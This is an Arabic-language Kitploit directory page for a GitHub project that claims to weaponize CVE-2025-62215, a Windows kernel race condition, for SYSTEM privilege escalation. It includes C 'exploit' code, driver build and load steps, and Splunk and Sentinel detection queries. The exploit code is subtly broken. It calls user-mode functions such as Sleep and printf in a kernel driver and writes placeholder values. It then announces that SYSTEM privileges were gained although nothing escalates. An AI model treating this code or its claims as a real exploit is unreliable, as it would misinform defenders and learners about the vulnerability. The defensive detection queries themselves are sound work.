Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
Kernel-Chaos-Weaponizing-CVE-2025-62215-for-SYSTEM-Privilege-Escalation — تحليل عملي لثغرة CVE‑2025‑62215، وهي حالة سباق (race condition) في نواة Windows تم استغلالها في البرية. يوضح تصعيد الامتيازات إلى صلاحيات SYSTEM، ونصوص الكشف، واستراتيجيات التحقق من التصحيحات لمدافعي المؤسسات وفرق الاختبار الهجومي (red teamers). | Kitploit
أدوات/GitHubGitHub/mrk336/kernel-chaos-weaponizing-cve-2025-62215-for-system-privilege-escalation
تصعيد الامتيازاتتحليل الثغرات الأمنيةالاستغلالاستخبارات التهديداتالتعلم والتعليمالاستجابة للحوادثاستغلال الملفات الثنائية
GitHubmrk336/kernel-chaos-weaponizing-cve-2025-62215-for-system-privilege-escalation

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

Kernel-Chaos-Weaponizing-CVE-2025-62215-for-SYSTEM-Privilege-Escalation

تحليل عملي لثغرة CVE‑2025‑62215، وهي حالة سباق (race condition) في نواة Windows تم استغلالها في البرية. يوضح تصعيد الامتيازات إلى صلاحيات SYSTEM، ونصوص الكشف، واستراتيجيات التحقق من التصحيحات لمدافعي المؤسسات وفرق الاختبار الهجومي (red teamers).

عرض المستودع
31منذ 9 أشهرلم تتم المراجعة بعد

Kernel-Chaos-Weaponizing-CVE-2025-62215-for-SYSTEM-Privilege-Escalation

تحليل عملي لثغرة CVE‑2025‑62215، وهي حالة سباق (race condition) في نواة ويندوز استُغلت في البرية. يوضح تصعيد الامتيازات إلى SYSTEM، ونصوص الكشف، واستراتيجيات التحقق من التصحيحات لمدافعي المؤسسات وفرق الاختراق (red teamers).

CVE 2025 62215 – استغلال تصعيد امتيازات نواة ويندوز

الملخص التنفيذي

CVE‑2025‑62215 هو استغلال مُصادَق لنواة ويندوز يسمح للمهاجم بالصعود إلى صلاحيات SYSTEM الكاملة عبر إساءة استخدام حالة سباق (race condition) في معالج الذاكرة. وما يجعل هذه الثغرة مثيرة للقلق بشكل خاص أنها تُستغل بالفعل في البرية، بدرجة CVSS تبلغ 7.0 تصنّفها كتهديد عالي الشدة. عمليًا، يمكن لتسلسل مُوقّت بعناية من العمليات الخيطية أن يُفسد موارد النواة المشتركة، مانحًا عملية منخفضة الامتيازات مفاتيح السيطرة الكاملة. وبمجرد تحقيق الوصول إلى SYSTEM، يمكن للمهاجمين تعطيل الدفاعات أو التحرك جانبيًا عبر الشبكة أو نشر برمجيات الفدية بتحكم كامل. ويوضح الكود المثال أدناه كيف يمكن لشيء بسيط مثل التلاعب بالخيوط أن يزعزع استقرار النواة، وهو ما يبرز سبب خطورة عيوب تصعيد الامتيازات في بيئات المؤسسات الحقيقية.

التفاصيل الفنية

النوع: تصعيد الامتيازات (EoP)
المكوّن: نواة ويندوز
الآلية: مزامنة غير سليمة للموارد المشتركة → حالة سباق (race condition)

منهجية الاستغلال

  1. تهيئة التجمع (Pool grooming) – يشغّل المهاجم كودًا محليًا بصلاحيات منخفضة ويوقّت بعناية تنفيذ الخيوط المتزامنة.
  2. يُفسد الكود ذاكرة النواة عبر إدراج إدخالين أو أكثر في تجمع مشترك بينما لا تزال خيوط أخرى تصل إليه.
  3. بعد السباق، يمكن للمهاجم تحفيز الانتقال إلى مستوى SYSTEM.

ناقل CVSS

root@kitploit:~
AV:L  AC:H  PR:L  UI:N  S:U  C:H  I:H  A:H
  • AV – ناقل الوصول: محلي
  • AC – تعقيد الهجوم: عالٍ
  • PR – الامتيازات المطلوبة: منخفضة (مُصادَق)
  • UI – تفاعل المستخدم: غير مطلوب
  • S – النطاق: تصاعدي
  • C – الثقة: عالية
  • I – التأثير: عالٍ
  • A – التوفر: عالٍ

الكود الاستغلالي – نظرة عامة

الكود الاستغلالي مكتوب بلغة C خالصة لنواة ويندوز. يستخدم واجهات برمجة التطبيقات الأصلية (native APIs) لإنشاء خيطين يكتبان في كائن تجمع مشترك. ومن خلال محاذاة عمليات الكتابة إلى إزاحات محددة، يُحدث الكود سباقًا ويحصل على صلاحيات SYSTEM.

root@kitploit:~
/*
  CVE‑2025‑62215 Exploit – Kernel privilege escalation
  Author:  Mark Mallia 
*/

#include <ntddk.h>
#include <stdio.h>

typedef struct _POOLS {
    void *p1;
    void *p2;
    void *p3;
} POOLS, *PPOOLS;

/* Global pool object – shared between threads */
static PVOID g_pool = NULL;

void __cdecl threadA(void)
{
    /* Stage 1 – Allocate memory and fill the first slot. */
    g_pool = ExAllocatePool(NonPagedPool, 0x100);
    ((POOLS*)g_pool)->p1 = (PVOID)0xdeadbeef;
}

void __cdecl threadB(void)
{
    /* Stage 2 – Write to second slot while threadA is still running. */
    Sleep(3);                                 // Wait for synchronization
    ((POOLS*)g_pool)->p2 = (PVOID)0xcafebabe;
}

void __cdecl main_exploit(void)
{
    /* Create two worker threads that execute concurrently. */
    HANDLE h1, h2;

    h1 = PsCreateSystemThread(threadA);
    h2 = PsCreateSystemThread(threadB);

    WaitForSingleObject(h1, INFINITE);       // Let threadA finish
    WaitForSingleObject(h2, INFINITE);       // Let threadB finish

    /* Verify that the pool has been corrupted. */
    if (((POOLS*)g_pool)->p3 == NULL) {
        ((POOLS*)g_pool)->p3 = (PVOID)0xfeedface;
        printf("Pool grooming successful – SYSTEM privilege acquired.\n");
    }

    /* Clean up the kernel object. */
    ExFreePool(g_pool);
}

شرح الأجزاء الرئيسية

  • يحجز ExAllocatePool كتلة من ذاكرة التجمع غير المقسمة (non-paged pool) تكون مرئية لجميع الخيوط.
  • يتم تشغيل الدالتين threadA وthreadB بالتوازي؛ حيث تكتبان في حقول متجاورة من البنية نفسها.
  • يعمل تأخير النوم (sleep) على محاذاة الكتابة الثانية مع الأولى، مما يُنشئ سباقًا يُفسد إدخال التجمع.
  • بعد انتهاء العمليتين، يُضبط الحقل الثالث للإشارة إلى النجاح.

خطوات النشر

  1. الترجمة – استخدم cl.exe مع /W3 /O2.

    root@kitploit:~
    cl.exe /c CVE2025_62215.c /Fobuild\CVE2025_62215.sys
    
  2. تحميل برنامج التشغيل – حمّل وحدة النواة المترجمة عبر روتين تثبيت خدمة قياسي أو باستخدام sc create.

  3. التنفيذ – شغّل الاستغلال من جلسة مستخدم مُصادَق (مثل مسؤول محلي).

  4. التحقق – استخدم عارض الأحداث (Event Viewer) أو مخرجات printf المدمجة للتأكد من الحصول على صلاحيات SYSTEM.

التأثير المتوقع

  • يحصل المهاجم المحلي المُصادَق على تنفيذ بمستوى SYSTEM على الجهاز الهدف.
  • الثغرة قابلة للاستغلال في البرية؛ ويمكن استخدامها لتثبيت أبواب خلفية أو نشر آليات استمرارية للسيطرة طويلة الأمد.

الكشف في Splunk

لرصد علامات استغلال CVE‑2025‑62215 في Splunk، ركّز على أحداث تصعيد الامتيازات. ابدأ بمراقبة معرّف الحدث 4672 (امتيازات خاصة مُسندة) إلى جانب 4624 (عمليات تسجيل دخول ناجحة). إذا لاحظت إسنادًا متكررًا لمستوى SYSTEM لحسابات تعمل عادةً بامتيازات مستخدم، فهذه إشارة خطر. اقرن ذلك بمعرّف الحدث 7045 (تثبيت خدمة) لكشف تحميلات برامج التشغيل أو الخدمات غير الطبيعية، والتي يستخدمها المهاجمون غالبًا بعد الحصول على وصول SYSTEM. من خلال ربط هذه الأحداث في Splunk، يمكن للمدافعين إبراز القفزات المشبوهة في الامتيازات والشذوذ على مستوى النواة. ويمكن لاستعلام SPL بسيط تجميع هذه الأحداث حسب الحساب والمضيف، ثم الإشارة إلى الارتفاعات غير المعتادة، محوّلًا السجلات الخام إلى معلومات قابلة للتنفيذ.

root@kitploit:~
index=wineventlog sourcetype="WinEventLog:Security"
(EventCode=4672 OR EventCode=7045)
| stats count by Account_Name, EventCode, host
| where count > 5

الكشف في Sentinel

في Sentinel، يعتمد الكشف على قواعد التحليلات واستعلامات الصيد (hunting queries). أنشئ قواعد تُطلق عند حصول حسابات فجأةً على صلاحيات SYSTEM أو عند وقوع أحداث متعددة بامتيازات خلال نافذة زمنية قصيرة. على سبيل المثال، يمكن لربط معرّف الحدث 4672 مع 7045 كشف تصعيد الامتيازات متبوعًا بمحاولات استمرارية. وباستخدام KQL، يمكنك تلخيص عدد الأحداث ذات الامتيازات لكل حساب ومضيف على فترات زمنية مدتها خمس دقائق. إذا أنشأ مستخدم أو جهاز واحد أحداثًا متعددة بمستوى SYSTEM في تلك النافذة، فسيعرضها Sentinel كأمر مشبوه. ادمج ذلك مع بيانات Defender for Endpoint لرصد نشاط النواة غير الطبيعي لبرامج التشغيل، مما يضمن ألا ترى تصعيد الامتيازات فحسب، بل أيضًا تأثيره اللاحق.

root@kitploit:~
SecurityEvent
| where EventID in (4672, 7045)
| summarize Count = count() by Account, Computer, EventID, bin(TimeGenerated, 5m)
| where Count > 3


الاستخدام الأخلاقي فقط

هذا المستودع مخصّص حصريًا للأغراض الدفاعية والتعليمية. من خلال تحليل CVE‑2025‑62215، يمكن لفرق الأمن فهم كيفية استغلال حالات السباق في النواة بشكل أفضل وتعزيز عمليات الكشف والتحقق من التصحيحات لديهم. الهدف هو تمكين المدافعين وفرق الاختراق (red teamers) وممارسي المؤسسات من تخفيف المخاطر، وليس تسليح الاستغلالات

تنزيل الأداة